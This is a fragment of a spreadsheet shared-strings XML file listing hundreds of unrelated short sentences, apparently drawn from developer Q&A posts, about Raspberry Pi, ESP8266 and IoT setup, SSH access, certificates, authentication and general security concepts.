    <t>If there is no compelling compatibility constraint, this encoding is preferred.</t>
  </si>
  <si>
    <t>PluggableJUEL can be configured to be transparently detected as
EL implementation by a Java runtime environment or JEE application
server.</t>
  </si>
  <si>
    <t>IF not entered, device id will be set to registration id itself, as per documentation.</t>
  </si>
  <si>
    <t>But when this device starts advertising again, it is not recognized.</t>
  </si>
  <si>
    <t>In headless installation, you shall save a file named 'ssh' without any extension (I did on mine and it works).</t>
  </si>
  <si>
    <t>The most common reasons for validation are to avoid entering data which violates a database schema, and to prevent unauthorized exploitation of a user interface.</t>
  </si>
  <si>
    <t>You need to make the Raspberry Pi to be an EtherCAT master.</t>
  </si>
  <si>
    <t>Passwords in LastPass Password Manager are protected by a master password and are encrypted locally and are synchronized to any other browser.</t>
  </si>
  <si>
    <t>Also keep in mind that buffers are there to store your information unless it is full so my guess is that your data won't be lost.</t>
  </si>
  <si>
    <t>JWT tokens are typically used protect API endpoints, and are often issued using OpenID Connect.</t>
  </si>
  <si>
    <t>After that you can create a ssh connection and also you can deploy your program remotely into raspberry pi.</t>
  </si>
  <si>
    <t>In order to connect to the device using , I used the IP of the android device that I saw on the default OS's app (the starting screen).</t>
  </si>
  <si>
    <t>This is not a real security measure but works well to avoid accidentally getting to your protected page by anyone.</t>
  </si>
  <si>
    <t>Code freeze is a part of the development lifecycle in which the version control system is locked, so new revisions of source files cannot be checked into the repository.</t>
  </si>
  <si>
    <t>Is there a secret handshake I can do during boot to prevent it from running my init.d script so I can get to login and a shell to fix it?</t>
  </si>
  <si>
    <t>Each board has the same code, but each has a unique ID defined on the code and some unique configuration they can access from a database on the web.</t>
  </si>
  <si>
    <t>I suggest you don't put the password in the Lua code at all but have it set at runtime.</t>
  </si>
  <si>
    <t>Adding the /dev/gpiomem device
Rather than exposing all of the host's devices to the container, you can be specific and only expose the /dev/gpiomem device to the container at runtime.</t>
  </si>
  <si>
    <t>An easy way is to log into your router and see all of the connected devices and pull the ip address from there.</t>
  </si>
  <si>
    <t>OpenSSH is the most widespread and de-facto standard implementation of SSH protocol (Secure Shell).</t>
  </si>
  <si>
    <t>Not only this code will run in every browser displaying the "username": the code may run authenticated as the current user, potentially administrator.</t>
  </si>
  <si>
    <t>Security updates are automatically applied on the initial boot of the AMI.</t>
  </si>
  <si>
    <t>Important Links:
About the security content of iOS 9.3.2 - Apple Support
iOS 9.3.2 - Wikipedia</t>
  </si>
  <si>
    <t>Remote Addresses are not reported via the Provider.getAddresses() method.</t>
  </si>
  <si>
    <t>I am trying to have a RaspberryPi (running Raspbian) join an Ad-Hoc network (no password) hosted by a desktop computer with a wireless card running Debian 7.</t>
  </si>
  <si>
    <t>Does anyone know a possibility to avoid the logout while closing the ssh session?</t>
  </si>
  <si>
    <t>2) the internet key software needs to be configured with a "Dial Number" too, which I don't know what's for.</t>
  </si>
  <si>
    <t>If I terminate ApplicationFrameHost process, the X screen will go away, but the MyTest.exe file remains locked as though the exe is still in use.</t>
  </si>
  <si>
    <t>The Locks will be controlled by, Bluetooth, ESP 8266 ( get mthod from phone) and using my laptops browser.</t>
  </si>
  <si>
    <t>I am using the MDNSResponder and I can successfully access my device with mydevice.local
However, my WiFi router (Netgear WGR614) list the device as ESP_FEA38A.</t>
  </si>
  <si>
    <t>So I'm using a Raspberry Pi 2 with a rfid scanner and wrote a script in python that logs people in and out of our attendance system, connects to our postgresql database and returns some data like how much overtime they have and whether their action was a login or logout.</t>
  </si>
  <si>
    <t>I was able to get passwordless setup via bash terminal using ssh-keygen and sharing rsa public file to mac.</t>
  </si>
  <si>
    <t>There isn't a form in which sign up for Windows Insider Program.</t>
  </si>
  <si>
    <t>In scenario 2: If I need to connect 50 things to my platform, will I be configuring each and every device to get the device ID, token, etc.?</t>
  </si>
  <si>
    <t>Extra details, in case they are relevant:
The app will be a contact and password manager.</t>
  </si>
  <si>
    <t>The router is set to accept an anonymous FTP (that should not be the problem).</t>
  </si>
  <si>
    <t>They want the bluetooth to broadcast on a single frequency for verifying if its going outside of the unlicensed spectrum or not.</t>
  </si>
  <si>
    <t>It's possible to access from a far away from my home where my pi is set through SSH or VNCViewer, but when I run a nodejs written server from my
pi, then it is not accessible from the browser.</t>
  </si>
  <si>
    <t>The problem is that Firebase Authentication is not available in Things because it requires user interaction.</t>
  </si>
  <si>
    <t>2- I want to Know I need set Wi-Fi SSID and password for ESP8266 when I run build.sh deploy command?!</t>
  </si>
  <si>
    <t>APT
PIP (Python 2.7.9, pip 1.5.6)
Python 3
As you can see from the above error, "cryptography" indicates it needs &gt; python3
I looked at the installation requirements and found that you need python 3.5+ if you use 3.</t>
  </si>
  <si>
    <t>I get the following errors:
The installation process starts with administration permissions.</t>
  </si>
  <si>
    <t>As indicated in other responses in SO, they start with default and have the right credentials set up.</t>
  </si>
  <si>
    <t>Samsung tech has told me that their tablets support ethernet connection only for internet.</t>
  </si>
  <si>
    <t>Is this sdk only supposed to run locally without any form of authorization enabled?</t>
  </si>
  <si>
    <t>edgeAgent as I understand periodically communicates to IOTHub to get device configuration changes.</t>
  </si>
  <si>
    <t>Currently it is unclear how the key-press-events of the remote can be detected in a "GATT-ian" fashion.</t>
  </si>
  <si>
    <t>:0 I was wondering if its possible at all in Hm11 Modules to mandatory require password before sending data.</t>
  </si>
  <si>
    <t>I don't understand why store information in the SPIFFS if you can't retrieve it.</t>
  </si>
  <si>
    <t>This library creates a SoftAP which has its own IP address and through which we can configure the WiFi router credentials.</t>
  </si>
  <si>
    <t>When it's the users first time using this product they will have to set it up (log into their account etc.).</t>
  </si>
  <si>
    <t>They have been configured as child devices so they work offline, without any Internet connection.</t>
  </si>
  <si>
    <t>I wonder this improved by including whole function to secondary one OR different way to use Lock.</t>
  </si>
  <si>
    <t>It would also allow me to easily disable the print of debug message by not setting the DEBUG macro.</t>
  </si>
  <si>
    <t>If you provide multiple arguments, no shell escaping is done, and the specified program execed directly.</t>
  </si>
  <si>
    <t>The one thing you do have to do with this strategy is to ensure
the uniqueness of all of the header guards.</t>
  </si>
  <si>
    <t>TCP/UDP/IP/Ethernet definitely support sending binary data without restriction.</t>
  </si>
  <si>
    <t>If the hardware connections look right, try the undocumented 'inverse_logic' flag in the  constructor.</t>
  </si>
  <si>
    <t>See this guide for Arch linux: https://wiki.archlinux.org/index.php/Disk_Encryption
If you encrypt your filesystem only he have the password can decrypt the sdcard.</t>
  </si>
  <si>
    <t>A dummy character should be send to ensure good communication.</t>
  </si>
  <si>
    <t>EDIT
This was related to corrupted files caused by delayed allocation of the ext4 filesystem.</t>
  </si>
  <si>
    <t>9600 baud is often enough, but may require asynchronous sending to prevent blocking code.</t>
  </si>
  <si>
    <t>So on your PI, you should be able to run 
Now, this would require a password each time it is run which would prevent automatic updates but you can use SSH authentication keys.</t>
  </si>
  <si>
    <t>I'm not sure why this constant is not exposed (newbie) - it is declared in client.py of the gps module</t>
  </si>
  <si>
    <t>Also, don't forget to check the firewall rules from your computer.</t>
  </si>
  <si>
    <t>For example, something like:
This would expose /sys on the host as /sys inside the container, and you would have access to the /sys/class/gpio hierarchy.</t>
  </si>
  <si>
    <t>Simply put, there is no safe order - but there is a relation.</t>
  </si>
  <si>
    <t>Default passcode is "000000"
1.5 Send AT+RESET to restart module.</t>
  </si>
  <si>
    <t>It's not as foolproof as possible but get the job done:
just use a simple  and treat the response adequately.</t>
  </si>
  <si>
    <t>Mona,
Your custom endpoint responds to two protocols: MQTT and HTTPS.</t>
  </si>
  <si>
    <t>If you need to do it manually, you will have to include the required signature into the request.</t>
  </si>
  <si>
    <t>My guess is that QT can't elevate permission to access some shared memory, because X is running with user privileges.</t>
  </si>
  <si>
    <t>Some of the supplied include files are not C++ safe, i. e. they need to be wrapped into
  (This could certainly be fixed, too.)</t>
  </si>
  <si>
    <t>You add the switches values together and compare with your set password.</t>
  </si>
  <si>
    <t>Reboot and test your configuration with eth0
After the next reboot you should have a reliable network configuration with static ip addresses.</t>
  </si>
  <si>
    <t>This strategy
  might seem simpler, because you skip the join procedure, but it has
  some downsides related to security.</t>
  </si>
  <si>
    <t>To activate the LED just do:
To detect when the bluetooth is disconnedted just refer to this question.</t>
  </si>
  <si>
    <t>SimpleCV Camera Class documentation is here:
As your resource is locked, it is unavailable or remains busy for fswebcam to access.</t>
  </si>
  <si>
    <t>The only way to gain some security is to physically secure the device in an enclosure that prevents the user from getting the SD card.</t>
  </si>
  <si>
    <t>The solution to this was as follows:
https://unix.stackexchange.com/a/12772
Also, ensuring that XQuartz (X11 client) is running on the client computer (macOS in this case).</t>
  </si>
  <si>
    <t>However, the embedded Lua app that you will run on the configured ESP can always use the  module, say, to log the IP (and other) configuration to some web service.</t>
  </si>
  <si>
    <t>If you don't have an app, you can probably pretend that Arduino is a "debugger device" (like a PC with a debugging driver), and then the Android OS will ask if you trust it or not, and then can issue debugger commands from Arduino.</t>
  </si>
  <si>
    <t>This behaviour is standardised and correctly implemented by the tools installed by Raspbian so its reliable.</t>
  </si>
  <si>
    <t>The watchdog timer plays an important role in system stability.</t>
  </si>
  <si>
    <t>and also maybe you can buy such info on the dark web which I advise highly against it!</t>
  </si>
  <si>
    <t>See here an example on how to register and retrieve the connection string from a device on IoTHub.</t>
  </si>
  <si>
    <t>Jasper does not cost anything to use, however telcos will apply a rev commit (min monthly spend) usually $500/month to gain access.</t>
  </si>
  <si>
    <t>This is intended to be used with hardware that requires you to hand over this data for HTTPS communication.</t>
  </si>
  <si>
    <t>That also means that it doesn't have a public IP of itself and can't receive direct communication from the internet.</t>
  </si>
  <si>
    <t>(Disclaimer, I've never tried one, but according to someone at Redpark, jailbreaking is not required, you just can't distribute your app on the app store.)</t>
  </si>
  <si>
    <t>Multicast DNS is a method for (generally) small networks to advertise services without user configuration.</t>
  </si>
  <si>
    <t>A lock screen is a user interface element used by various operating systems.</t>
  </si>
  <si>
    <t>Using this extension, PHP can use some OpenSSL functions to do direct encryption.</t>
  </si>
  <si>
    <t>The bcrypt Ruby gem provides a simple wrapper for safely handling passwords.</t>
  </si>
  <si>
    <t>Deny the access to application, system or private software resources if the credentials (password, user-name combination) is not correct.</t>
  </si>
  <si>
    <t>Redbird is a reverse proxy for Node.js with support for virtual hosts and multiple SSL certificates.</t>
  </si>
  <si>
    <t>GateOne is a web SSH solution which provides Javascript APIs to interface into serial consoles and virtual servers.</t>
  </si>
  <si>
    <t>For issues relating to performing validation operations.</t>
  </si>
  <si>
    <t>Usually they take the form of machine-readable cryptographic keys and/or passwords.</t>
  </si>
  <si>
    <t>Their secure data pipeline processes over 250 million miles of anonymized traffic data per day.</t>
  </si>
  <si>
    <t>It preserves all of the type safety, while removing the remaining clutter.</t>
  </si>
  <si>
    <t>Application Verifier also includes checks to predict how well an application may perform under various account privileges.</t>
  </si>
  <si>
    <t>This allows the underlying Linux kernel to protect each application's resources.</t>
  </si>
  <si>
    <t>The theory behind HWID is to ensure that the operating system is not being used on any device other than the one for which it was purchased and registered.</t>
  </si>
  <si>
    <t>Restrict you to using usernames and passwords, OpenIDs, or any other method of authenticating.</t>
  </si>
  <si>
    <t>Cheyenne is small, secure, efficient and has no external dependencies.</t>
  </si>
  <si>
    <t>First occurrence of a software event such as logging in, displaying a dialog, etc.</t>
  </si>
  <si>
    <t>By targeting the commodity cloud with a library OS, unikernels can provide greater performance and improved security compared to Singularity.</t>
  </si>
  <si>
    <t>This encoding is very frequently used in X.509 PKI environments or the communication between heterogeneous computer systems.</t>
  </si>
  <si>
    <t>A dual binding exposes the IP address of the client to the service.</t>
  </si>
  <si>
    <t>If so, the user should verify DNS name resolution, configuration and Windows Internet Naming Service (WINS) availability.</t>
  </si>
  <si>
    <t>About
Chef Vault is an alternative tool for managing secrets with Chef.</t>
  </si>
  <si>
    <t>XSS is a frequent type of attempting to steal data or harm a website via JavaScript.</t>
  </si>
  <si>
    <t>Flag validity depends on the state of the TCP connection.</t>
  </si>
  <si>
    <t>One potential use case of the JWT is as the means of authentication and authorization for a system that exposes resources through an OAuth 2.0 model.</t>
  </si>
  <si>
    <t>Spy++ (aka SpyXX, as the main binary is SpyXX.EXE) shows you a parented hierarchy of all Windows in your system.</t>
  </si>
  <si>
    <t>Ensure payment is received and customers are comfortable providing their information.</t>
  </si>
  <si>
    <t>Permissions are a series of rules that defines the action that authenticated users of computer systems can do.</t>
  </si>
  <si>
    <t>MIDP 2.0 supports HTTPS and
leverages existing standards such as
SSL and WTLS to enable the
transmission of encrypted data.</t>
  </si>
  <si>
    <t>The full text of the error code is:
ORA-01017: invalid username/password; logon denied 
Cause: An invalid username or password was entered in an attempt to
  log on to Oracle.</t>
  </si>
  <si>
    <t>However, the very latest development builds still require a registration code.</t>
  </si>
  <si>
    <t>Its secure:
Using phpass library for password hashing (instead of unsafe md5).</t>
  </si>
  <si>
    <t>These integrity constraints ensure compatibility between parts of the schema.</t>
  </si>
  <si>
    <t>Only Oracle technical support should diagnose and take actions to prevent or resolve damage to the database.</t>
  </si>
  <si>
    <t>The pairing mechanism is currently based on WebSockets, so the app and the camera needs to be on the same network to be discovered and work correctly.</t>
  </si>
  <si>
    <t>These are multi-level macros which encode direct volatile access to the SFR locations.</t>
  </si>
  <si>
    <t>An app distributed outside the Mac App Store runs from a
  randomized path when it is launched and so cannot access such external
  resources.</t>
  </si>
  <si>
    <t>I think you'll need to add a role and IAM signing configuration to the Data Source.</t>
  </si>
  <si>
    <t>Geo-fencing is a means of notification when a location-aware device crosses this virtual perimeter.</t>
  </si>
  <si>
    <t>When the app is signed based on that provisioning profile, it can be installed on those devices.</t>
  </si>
  <si>
    <t>From a programming perspective, we are not interested in how to assign permissions in a particular context (i.e.</t>
  </si>
  <si>
    <t>However as far as I understand this page here, the googleapis-Server will prefer the cipher TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256.</t>
  </si>
  <si>
    <t>I tried to set Https with Tomcat 7, it works but the communication with the web service is too much slow.</t>
  </si>
  <si>
    <t>To do this, I downloaded Chromium onto the Raspberry Pi and signed in using my gmail account.</t>
  </si>
  <si>
    <t>The php is as follows
When I execute the php file from using ssh from my laptop, the motor runs well, but it does not work from my android app.</t>
  </si>
  <si>
    <t>I modified the New-CACertsCertChain script in ca-certs.ps1 (set the $useEcc var to $false) and reran.</t>
  </si>
  <si>
    <t>One which delivers excellent security with greatest genericity, soft settings and least user-involvement?</t>
  </si>
  <si>
    <t>One of the rpi's are considered the "master" and from my android phone I will use ssh to remote control the master.</t>
  </si>
  <si>
    <t>I am remoting my Raspberry Pi over ssh in the same Network via Putty
I created an executable jar File of my Java Program and tried to run it over the raspberry but the only Thing I get is the Error below.</t>
  </si>
  <si>
    <t>Now I need to verify this certificate in the "Certificates" section of the Device Provisioning Service in the portal.</t>
  </si>
  <si>
    <t>However, it turns out that my usecase, using the cert on esp8266 chip requires a cert that is NOT x509v3 since the module sdk TLS lib doesn't support it.</t>
  </si>
  <si>
    <t>We want to be able to revoke such token in order to immediately disconnect a certain device.</t>
  </si>
  <si>
    <t>IP =  192.168.20.205
The user the pi connects to the Access server is set to be a VPN gateway with :
Allow Access From: all server-side private subnets
Allow Access From: all other VPN clients
192.168.20.0/24.</t>
  </si>
  <si>
    <t>However, when I try to sign a .cat file for a driver's .inf file, it all appears to work fine, but I end up getting a "Code 52" on the device.</t>
  </si>
  <si>
    <t>Second, in order to get PHP's INI settings you need to use the ini_get() function:
define('DB_USER', ini_get('mysql.default_username'));
define('DB_PASS', ini_get('mysql.default_password'));
The database name is the name of the database (!)</t>
  </si>
  <si>
    <t>The BrickPi firmware has a safety feature that shuts down motors if it doesn't hear from the Raspberry Pi every few seconds.</t>
  </si>
  <si>
    <t>After a while, the arduino is re-registered by the machine and is assigned a new port number.</t>
  </si>
  <si>
    <t>You will always get a warning message about the certificate even if you set verify to False.</t>
  </si>
  <si>
    <t>At a guess, you need locking, so that only one or the other of your interfering scripts runs at a time.</t>
  </si>
  <si>
    <t>The openweather API permits HTTPS calls only if you have a pro (paid) subscription.</t>
  </si>
  <si>
    <t>Some battery-powered devices don't always sleep and can be polled, such as some door locks.</t>
  </si>
  <si>
    <t>After an interruption is restarted, the receiver would validate the most recent chunk with the CRC checksum.</t>
  </si>
  <si>
    <t>I still can't connect remotely because the raspberry pi is running a VPN and this is causing the SSH request to timeout, but that is a separate question.</t>
  </si>
  <si>
    <t>You might need to enroll your device as COPE device, by installing vendor signed system service.</t>
  </si>
  <si>
    <t>Both the resource directory and the proxy should be configurable to not talk to devices outside the local network unless they are authenticated.</t>
  </si>
  <si>
    <t>This will accept connections from anywhere, on both IPv6 and IPv4, subject of course to any firewall rules.</t>
  </si>
  <si>
    <t>Device twins can, for example, be used to configure the telemetry reporting interval.</t>
  </si>
  <si>
    <t>If there is nothing in log, then maybe some firewall is blocking amqp connection.</t>
  </si>
  <si>
    <t>Attach an IAM role to the data source that grants the appropriate permissions to call the IoT Device Shadow operations.</t>
  </si>
  <si>
    <t>SharpCompress is a compression library for .NET/Mono/Silverlight/WP7 that can unrar, un7zip, unzip, untar unbzip2 and ungzip with forward-only reading and file random access APIs.</t>
  </si>
  <si>
    <t>NSKeyedUnarchiver, a concrete subclass of NSCoder, defines methods for decoding a set of named objects (and scalar values) from a keyed archive.</t>
  </si>
  <si>
    <t>You can also write applications that act as filters that provide some kind of service to other applications, such as authentication, file uploads, request isolation, or multiplexing.</t>
  </si>
  <si>
    <t>Denial-of-service (or DoS) is the intentional attack of a machine or resource, aiming to make unavailable to its intended users.</t>
  </si>
  <si>
    <t>It treats applications as untrusted principals and isolates them into separate processes with different user IDs.</t>
  </si>
  <si>
    <t>Essentially keystone's role is to grant tokens to users be they people, services, or anything at all.</t>
  </si>
  <si>
    <t>Usful links:
Getting started
Retrieving data
Modifying data
Request authentication and interception</t>
  </si>
  <si>
    <t>With this new API you get a set of tokens that identify friends along with their names and pictures.</t>
  </si>
  <si>
    <t>It also allows web applications to authenticate users without gaining access to a user's security credentials, such as a password.</t>
  </si>
  <si>
    <t>You can code, design, debug and deploy with VisualSVN as your silent partner that safeguards your source code without being distracted to external client applications.</t>
  </si>
  <si>
    <t>Might I need to make an OAuth authentication?</t>
  </si>
  <si>
    <t>I can connect via SSH with putty using that name which makes me wonder that there is something fishy going on.</t>
  </si>
  <si>
    <t>I have 2 codes I made.</t>
  </si>
  <si>
    <t>To be honest though, your project sounds like you are purposefully building a remote execution exploit for yourself, so it probably doesn't matter.</t>
  </si>
  <si>
    <t>Is there a security reason for that?</t>
  </si>
  <si>
    <t>The certificate structure for an enrollment group is more complex and requires at least a certificate issuer (CA Root or Issuing Authority) that will sign leaf certificates that are used by the devices.</t>
  </si>
  <si>
    <t>ProcessCmdKey is not present in UWP.</t>
  </si>
  <si>
    <t>I installed putty, and can manually ssh into the pi's and run commands, but I can't teach that process to the employees.</t>
  </si>
  <si>
    <t>Here is an example of a correctly formatted configuration:
Name: my_fabric
Host: 01234567890123456789-vp2.us.blockchain.ibm.com
Port: 5001
User ID: user_type1_0
Secret Key: 0123456789
Use TLS?</t>
  </si>
  <si>
    <t>https://www.digitalocean.com/community/tutorials/how-to-configure-ssh-key-based-authentication-on-a-linux-server
https://www.garron.me/en/go2linux/ssh-sudo-run-commands-remote-server.html</t>
  </si>
  <si>
    <t>No credentials were supplied to the runtime, so it attempted to access the registry anonymously.</t>
  </si>
  <si>
    <t>Values in the range 0x0400 (the value of WM_USER) through 0x7FFF are
available for message identifiers for private window classes.</t>
  </si>
  <si>
    <t>3) Are there any chances that the GC dlmalloc_inspect_all call can be suppressed or otherwise synchronized to avoid this issue?</t>
  </si>
  <si>
    <t>Is anybody curious enough to give me a hint, how to establish a solid communication?</t>
  </si>
  <si>
    <t>The messages I send to the IoT hub are registered in the IoT hub, but won't be routed to the service bus queue.</t>
  </si>
  <si>
    <t>I have a confusion here, IoT devices sends data in the form of telemetry and the same would be done through configuring device twins(might be I am wrong.</t>
  </si>
  <si>
    <t>UPDATE: I've tried downloading the signed version I have checked into Android console.</t>
  </si>
  <si>
    <t>If you're not using chrome (or chromium) then you need to check that your client has support for ntlm http auth scheme.</t>
  </si>
  <si>
    <t>From a bug in the code, a firewall blocking the messages, NIC settings or the devices simply not being connected.</t>
  </si>
  <si>
    <t>Replace the values assigned for ssid and psk with the real values for your secure WLAN access.</t>
  </si>
  <si>
    <t>As described in the policy, this restriction will only work if the agent is working as the device-owner.</t>
  </si>
  <si>
    <t>After hours of analysis why the server.py and client.py weren't working(even after the firewall was disabled), there was an error in the server.py code:  "word should not be a string".</t>
  </si>
  <si>
    <t>Instead of sending a EC value in the patch body, you could update the device to have communication blocked.</t>
  </si>
  <si>
    <t>The PayPal NVP API is exposing various features of the PayPal platform through NVP requests (name/value pairs).</t>
  </si>
  <si>
    <t>According to RFC 2616 the request can be altered solely for what is required for proxy authentication and identification.</t>
  </si>
  <si>
    <t>Nearby uses a combination of Bluetooth, Bluetooth Low Energy, Wi-Fi and an ultrasonic modem to communicate a unique-in-time pairing code between devices.</t>
  </si>
  <si>
    <t>Also, assertions are not for use in validating input or in other situations where exceptions are preferred.</t>
  </si>
  <si>
    <t>Verify that the net service name or database name used as the connect identifier is configured in the directory.</t>
  </si>
  <si>
    <t>It may also be worth noting that when I initially run the app, the input goes to the SSH shell/Putty window.</t>
  </si>
  <si>
    <t>But the publicly-accessible WiFi requires a login/password every time.</t>
  </si>
  <si>
    <t>I want to enable voice recognition on a webpage that's being viewed from Chromium on Raspbian.</t>
  </si>
  <si>
    <t>Then on my windows machine I open putty to ssh into my pi, with X forwarding enabled for this session.</t>
  </si>
  <si>
    <t>I configure systems for a living and the majority of these need a password to log into and all of them use long or complex password that are just a pain to type in especially when you have to do it on 25+ systems at a time.</t>
  </si>
  <si>
    <t>The best scenario would be direct communication, even without any type of handshake.</t>
  </si>
  <si>
    <t>Tera term allows me to "transfer" the mcm file but I do not get any type of confirmation in the terminal window.</t>
  </si>
  <si>
    <t>I also added my domain as an exception to the DNS-Rebinding-Protection in my router.</t>
  </si>
  <si>
    <t>All implementations I see start with connecting to wifi in station mode to get a local IP with hardcoded SSID and password, which is not known at this stage.</t>
  </si>
  <si>
    <t>I am getting this error for the installation of second profile(for MDM Device Identity certificate)
My final merged .pem file looks like this.</t>
  </si>
  <si>
    <t>Pi gets the card information through serial and upload them to a remote database.</t>
  </si>
  <si>
    <t>For setting up wifi I host a small webserver, where the user can enter the credentials.</t>
  </si>
  <si>
    <t>The hardest part would be reading the serial data coming in and ensuring that it's valid.</t>
  </si>
  <si>
    <t>That bash script checks for the existance of a file that is something called reboot.txt that can be located in /opt/reboot.txt
While some would balk at superusers running a cronjob like this, I say it is a better alternative than giving www-data sudo privileges.</t>
  </si>
  <si>
    <t>A little more on this: we have confirmed that broken configuration will occur when app binaries are not found.</t>
  </si>
  <si>
    <t>It only takes effect on the next boot too, so you already have the greatest possible denial of service capability.</t>
  </si>
  <si>
    <t>This introduces a 3rd machine and acts like your own hacked form of DDNS (look it up, if you're not familiar with it).</t>
  </si>
  <si>
    <t>If your AP allows you to register mac addresses of stations then it will provide one more layer of security since getting password will not be sufficient to connect the wifi network.</t>
  </si>
  <si>
    <t>This is an absolutely unbreakable rule when talking about anonymously accessible services.</t>
  </si>
  <si>
    <t>New customers will see Unknown Publisher in the trust dialog because you are now using a test certificate.</t>
  </si>
  <si>
    <t>Instead of running as a separate service and configuring security, one can just start up an instance of a new LocalDB runtime as needed.</t>
  </si>
  <si>
    <t>Basic Service Set Identification - MAC address of an Wireless Access Point.</t>
  </si>
  <si>
    <t>A contract in the sense of Solidity is a collection of code (its functions) and data (its state) that resides at a specific address on the Ethereum blockchain.</t>
  </si>
  <si>
    <t>Prisma replaces traditional ORMs by providing a type-safe layer for your database.</t>
  </si>
  <si>
    <t>Fiddler2 is a web debugging proxy, which allows you to log, examine, modify and replay HTTP/HTTPS traffic from your computer.</t>
  </si>
  <si>
    <t>Gaol is a cross-platform, operating-system-level application sandboxing library written in Rust.</t>
  </si>
  <si>
    <t>There's a Linux distro, Security Onion, which comes with all these tools installed and so it's an excellent resource for learning about Snort and Network Security Monitoring in general (i.e.</t>
  </si>
  <si>
    <t>Provides single sign-on capabilities
Provides URL Filtering mechanism.</t>
  </si>
  <si>
    <t>In case of Apache server some configuration settings can be changed using  .htaccess files, but the usage is restricted to php_flag.</t>
  </si>
  <si>
    <t>TIGER data is available without cost because U.S. Government publications are required to be released into the public domain.</t>
  </si>
  <si>
    <t>When Xforwarding has been enabled in the ssh server configuration, an ssh connection capable of handling X traffic can be taken with commands  or ssh -Y hostname.</t>
  </si>
  <si>
    <t>RMStore doesn't perform receipt verification by default but provides reference implementations.</t>
  </si>
  <si>
    <t>In order to use the Negotiate method you need a browser supporting it (currently standard IE6.0 or Mozilla with the negotiateauth extension).</t>
  </si>
  <si>
    <t>The software is therefore immune to side-channel attacks that rely on leakage of information through the branch-prediction unit.</t>
  </si>
  <si>
    <t>Yarn resolves these issues around versioning and non-determinism by using lockfiles and an install algorithm that is deterministic and reliable.</t>
  </si>
  <si>
    <t>You put code in the tag that authenticates the user and identifies the user with a set of roles.</t>
  </si>
  <si>
    <t>The key file is stored in the following location: /data/data/com.whatsapp/files/key
The crypt12 database files are located in the sdcard directory of an Android device with WhatsApp installed.</t>
  </si>
  <si>
    <t>This update also addressed security issues, network compatibility / features, and some settings.</t>
  </si>
  <si>
    <t>BLE is here to stay with v4.1 and upcoming v4.2 specifications which will improve bandwidth, bring support for IPv6, better security, etc.</t>
  </si>
  <si>
    <t>FieldValidators (such as the EmailValidator) are designed to perform validation checks on a single field.</t>
  </si>
  <si>
    <t>The problem is that my apartment provides me with wireless internet and I can't access the router to enable port-forwarding.</t>
  </si>
  <si>
    <t>But actually it looks like it is not (setting this cipher in apache http client enables communication with my test server, but breaks with google).</t>
  </si>
  <si>
    <t>https://forum.gitlab.com/t/cannot-clone-via-https-with-error-server-certificate-verification-failed/4782 doesn't seem to apply as it is talking about the server side?</t>
  </si>
  <si>
    <t>Do you recommend using a central system using a robust firewall or using multiple Arduino modules for each sensor?</t>
  </si>
  <si>
    <t>Similarly my college Identity Tag different key is set by card seller where that key did not matched with default keys that i used in my source code.</t>
  </si>
  <si>
    <t>Enabling TLS (SSL) will prevent ISPs from traffic shaping resulting in Gateway Timeouts among other issues.</t>
  </si>
  <si>
    <t>Beware that there are huge gaping security issues with doing something like that - you're literally allowing a remote program to execute whatever it feels like on the ESP8266.</t>
  </si>
  <si>
    <t>Is there a way to ensure the connection between the intranet server (pi) and the user is secure so the location functionality can be enabled?</t>
  </si>
  <si>
    <t>This enables those two devices to connect to each other in the future without repeating the pairing process to confirm device identities.</t>
  </si>
  <si>
    <t>Please make sure that device is in a network which has access to the server.</t>
  </si>
  <si>
    <t>Make SSH tunnel between VPS and Raspberry Pi.</t>
  </si>
  <si>
    <t>A simple app (few API endpoints for login and out and a few checks) and a basic website with dynamic content is setup pretty quickly.</t>
  </si>
  <si>
    <t>I am a rookie in network security field.</t>
  </si>
  <si>
    <t>Does Apple allow any kind of WiFi access through their APIs other than through a browser?</t>
  </si>
  <si>
    <t>The firmware version and configuration are as below.</t>
  </si>
  <si>
    <t>**
Code efficacy was NOT considered, this is a demo only.</t>
  </si>
  <si>
    <t>I don't have an Ethernet shield.</t>
  </si>
  <si>
    <t>for password typing.</t>
  </si>
  <si>
    <t>What is the status of 802.1x in Arduino or an ATmega microcontroller?</t>
  </si>
  <si>
    <t>It's a rails app 3.2.8 using devise for authentication.</t>
  </si>
  <si>
    <t>token</t>
  </si>
  <si>
    <t>Here's my pseudocode.</t>
  </si>
  <si>
    <t>SD contains 400 files with names 00000000; 0000001; 0000002; ... 00000098; 0000099; 0000100; ... 00000398; 00000399.</t>
  </si>
  <si>
    <t>Ask for a 4-digit password.</t>
  </si>
  <si>
    <t>FYI I am using putty SSH to the raspberryPi.</t>
  </si>
  <si>
    <t>I own a RaspberryPi that I can connect only through ssh.</t>
  </si>
  <si>
    <t>$newLine);
            $smtpResponse = fgets($smtpConnect, 4096);
            $logArray['heloresponse2'] = "$smtpResponse";
            //request for auth login
            fputs($smtpConnect,"AUTH LOGIN" .</t>
  </si>
  <si>
    <t>I have a Raspberry pi that I have been accessing through SSH, but now I need to run a python program on it that has a GUI.</t>
  </si>
  <si>
    <t>I'm not sure how to do this through SSH.</t>
  </si>
  <si>
    <t>But I cant get the codes....</t>
  </si>
  <si>
    <t>I then set up the passphrase using ssh-keygen.</t>
  </si>
  <si>
    <t>but I still don't know how to modify the old code with these OAuth codes to get it working again.</t>
  </si>
  <si>
    <t>How can I authenticate to the Xively MQTT server on arduino.</t>
  </si>
  <si>
    <t>I am trying to access a PHP file in my server with an Arduino and the Ethernet shield.</t>
  </si>
  <si>
    <t>The Pi can activate and deactivate the satellite.</t>
  </si>
  <si>
    <t>I have to IEEE 802.15.4 devices running.</t>
  </si>
  <si>
    <t>still using eth0, wlan0 .etc).</t>
  </si>
  <si>
    <t>I tried to remove autologin and sudo without password, but also don't works.</t>
  </si>
  <si>
    <t>below are my two seperate codes.</t>
  </si>
  <si>
    <t>I am trying to get access to the register of my Raspberry Pi.</t>
  </si>
  <si>
    <t>Ss   08:29   0:00  \_ sshd: pi [priv]  
pi        4030  0.0  0.3   9804  1520 ?</t>
  </si>
  <si>
    <t>Ss   09:29   0:00  \_ sshd: pi [priv]  
pi        4700  0.0  0.3   9804  1528 ?</t>
  </si>
  <si>
    <t>Please help me out with some codes.</t>
  </si>
  <si>
    <t>I post my codes here.</t>
  </si>
  <si>
    <t>I would like to use VNC SSH and/or FTP.</t>
  </si>
  <si>
    <t>I just wouldn't let me SSH in.</t>
  </si>
  <si>
    <t>unless i unlock it.</t>
  </si>
  <si>
    <t>Connect to the Raspberry Pi over SSH.</t>
  </si>
  <si>
    <t>Please, are my codes right?</t>
  </si>
